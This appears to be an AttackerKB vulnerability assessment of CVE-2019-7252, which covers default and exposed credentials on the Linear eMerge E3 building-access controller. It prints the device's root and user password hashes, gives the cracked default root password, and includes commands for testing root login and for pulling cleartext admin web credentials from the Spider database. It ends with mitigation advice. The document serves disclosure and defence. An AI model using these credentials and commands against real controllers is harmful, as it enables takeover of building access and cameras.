Very High
CVE-2019-7252
CVE-2019-7252
Add Assessment
Technical Analysis
In my article cve-2019-7256 at attackerkb.com, I already elaborated on the security risks and vulnerabilities that still exists on the Linear eMerge E3 access controller.
Beside the RCE vulnerabilities, also default credentials exist within the vulnerable configuration that can be easily leveraged to gain privileged access to the system.
There are two significant vulnerabilities:
The first one is based on a default root password that is a stored in the /etc/passwd and is available on the vulnerable configuration. This can be used to escalate to root privileges using the RCE vulnerability CVE-2019-7256 or use these credentials in combination with ssh (if enabled) to get root access to the access controller.
The second credential vulnerability allows an unauthenticated malicious actor to obtain the web credentials for user admin from the spider database that is accessible and readable for the world on the access controller. With this access, the malicious actor is able to control the Linear eMerge E3 access platform, the access to building and its cameras and the authority to manage the access rights of users.
Lets quickly demonstrate both vulnerabilities…
We assume that we have already gained access to the system using the RCE described in CVE-2019-7256
ls -l /etc/passwd -rwxr--r-- 1 e3user linear 733 Nov 13 2012 /etc/passwd cat /etc/passwd root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/home/default: e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
AS you can see is the default root password hash stored directly in /etc/passwd and readable for world. Normally, these password hashes are stored in a /etc/shadow file that is only readable for root. With this configuration, It is very easy to retrieve the hash and run a password dictionary or brute force attack with for instance hashcat to retrieve the password. And do not worry, somebody did this job already in 2019 ;–) –> davestyle.
To test if the root default password is available…
echo davestyle | su -c whoami root
The second credential vulnerability can be exploited by querying the spider access controller database which has the user and password information stored in clear text.
This database resides in /tmp/SpiderDB/Spider.db and with the command below you can very easily retrieve the admin web credentials.
grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID ID='admin',Password='xxxxxxx'
And if this is not successful, you can always try the default web credential setting admin:admin
Another Metasploit module to test the availability of the default root password and leak the admin web credentials has been submitted to the Metasploit mainstream.
Mitigation
Change the default root password on your access controller.
Update your Linear eMerge E3 access controller to a higher version then 1.00-06.
References
Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities
Packet storm
Credits
Credits goes to the security researcher below who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic
CVSS V3 Severity and Metrics
General Information
Vendors
- nortekcontrol
Products
- linear emerge elite firmware,
- linear emerge essential firmware
